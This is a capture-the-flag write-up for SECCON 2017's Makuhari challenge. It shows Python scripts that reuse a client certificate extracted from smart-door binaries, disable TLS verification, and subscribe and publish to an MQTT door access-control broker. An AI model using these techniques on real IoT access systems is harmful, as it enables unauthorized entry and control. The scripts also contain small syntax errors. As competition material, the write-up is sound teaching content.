SECCON 2017 Final Competition (Domestic) Write-up

makuhari.md

Makuhari (幕張)

This write-up describe Makuhari (幕張) challenge given at SECCON 2017 final competition for domestic teams.

The challenge

The following 2 binaries were provided.

• dooriccreaderapp_v1
  • 5ba48b4bb315b33250b812fb0deefdda5aac19d2db07d9bf26239215d4c51dfc
  • ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, with debug_info, not stripped
• doorlockctlapp_v1
  • e65bf81d3c6ccc32407c7f9d63f3db8dd52307bb8decc39070cf8d0dd1240204
  • ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, with debug_info, not stripped

Analysis

Both binaries written in Golang attempt to connect MQTT broker to control smart door & IC card reader.

# ./doorlockctlapp_v1 --help
Usage of ./doorlockctlapp_v1:
  -h string
    	MQTT broker address (default "makuhari.seccon")
  -p string
    	MQTT broker port (default "1883")

# ./dooriccreaderapp_v1 --help
Usage of ./dooriccreaderapp_v1:
  -h string
    	MQTT broker address (default "makuhari.koth.seccon")
  -i string
    	idm hex representation without hex prefix (default "000000000000")
  -p string
    	MQTT broker port (default "8883")

In the competition, makuhari.seccon didn't exist but makuhari.koth.seccon at 10.0.13.1 can be connected by MQTT with TLS.

First flag

Both executables contains TLS certificates/key files for connectiong MQTT broker. The first flag located in the client certificate as below.

$ openssl x509 -in client.crt -text
Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number: 12132904043160716613 (0xa860bbf1c27ec545)
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=JP, ST=Tokyo, L=Senjyu, O=SECCON, CN=secconfinaltrust
        Validity
            Not Before: Feb 17 00:08:17 2018 GMT
            Not After : Feb 17 00:08:17 2019 GMT
        Subject: C=JP, ST=Tokyo, L=Makuhari, O=Eag1eJum7, CN=debug.makuhari/emailAddress=SECCON{CLIENT_CERT_IS_C0MM0N_BY_DELIVERY_REAS0N}
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption

Second flag

The flag was published by MQTT broker (makuhari.koth.seccon) periodically. We could see the flag by subscribing topic "mkhr/v/1/access/controller" (See makuhari_subscribe.py).

mkhr/v/1/access/controller: {"idm": "0114514810191900", "device-uuid": "1565a6cc-718a-4b35-ab5c-272b3ceadd17"}
mkhr/v/1/access/controller: {"idm":"000000000000","device-uuid":"80b5d612-4b5a-4f7a-986d-99532e206c7c","dt":1518848233}
mkhr/v/1/access/controller: {"warn": "DoorCtl firmware update is broken. DoorCtl firmware update is scheduled at 2018/02/17 15:00(JST)."}
mkhr/v/1/access/controller: {"second_flag": "SECCON\\{MQTT_1N_THE_W1LD\\}"}
mkhr/v/1/access/controller: {"idm": "0146581920292901", "device-uuid": "80b5d612-4b5a-4f7a-986d-99532e206c7c"}

Defence keyword

After updating DoorCtl firmware (announced in MQTT message as above), we could see the following message:

mkhr/v/1/access/controller: {"warn": "Submit your flag(json). \ttopic: mkhr/v/1/access/controller, 'devise-uuid':'door devise of outgoing no one else', 'idm':'closed person', 'flag':'your flag' "}

We got defence points by submitting our defence keyword (See makuhari_publish.py).

makuhari_publish.py

import paho.mqtt.client as mqtt
import ssl
import time

flag_file = '../flagword.txt'
host = '10.0.13.1'
port = 8883
ca_cert = 'ca.crt'
client_cert = 'client.crt'
client_key = 'private.key'

topic = 'mkhr/v/1/access/controller'
qos = 0

def on_connect(client, userdata, flags, respons_code):
    print('[*] status {0}'.format(respons_code))

def on_message(client, userdata, message):
    print('[*] {}: {}'.format(message.topic, str(message.payload))

def main():
    while True:
        # read flagword
        with open(flag_file, 'r') as f:
            for line in f:
                flagword = line.strip()
                print 'flagword: ' + flagword

        client = mqtt.Client(protocol=mqtt.MQTTv311)
        client.username_pw_set('debug', password='')
        client.tls_set(ca_cert,
            certfile = client_cert,
            keyfile = client_key,
            tls_version = ssl.PROTOCOL_TLSv1_2)
        client.tls_insecure_set(True)

        ### callback function
        client.on_connect = on_connect
        client.on_message = on_message

        client.connect(host, port=port, keepalive=60)
        message = '{"device-uuid":"no one else outgoing door", "idm":"closed person", "flag":"%s"}' % flagword
        client.publish(topic, message, qos)
        client.disconnect()
        time.sleep(60)

if __name__ == '__main__':
    main()

makuhari_subscribe.py

import paho.mqtt.client as mqtt
import ssl

host = '10.0.13.1'
port = 8883
ca_cert = 'ca.crt'
client_cert = 'client.crt'
client_key = 'client.key'

#topic = 'mkhr/v/1/unlock/door/1'
#topic = 'mkhr/v/1/access/controller'
topic = 'mkhr/v/1/#'
qos = 0

def on_connect(client, userdata, flags, respons_code):
    print('[*] status {0}'.format(respons_code))

def on_message(client, userdata, message):
    print('[*] {}: {}'.format(message.topic, str(message.payload))

if __name__ == '__main__':
    client = mqtt.Client(protocol=mqtt.MQTTv311)
    client.tls_set(ca_cert,
        certfile = client_cert,
        keyfile = client_key,
        tls_version = ssl.PROTOCOL_TLSv1_2)
    client.tls_insecure_set(True)

    client.on_connect = on_connect
    client.on_message = on_message

    client.connect(host, port=port, keepalive=60)
    client.subscribe(topic, qos=qos)
    client.loop_forever()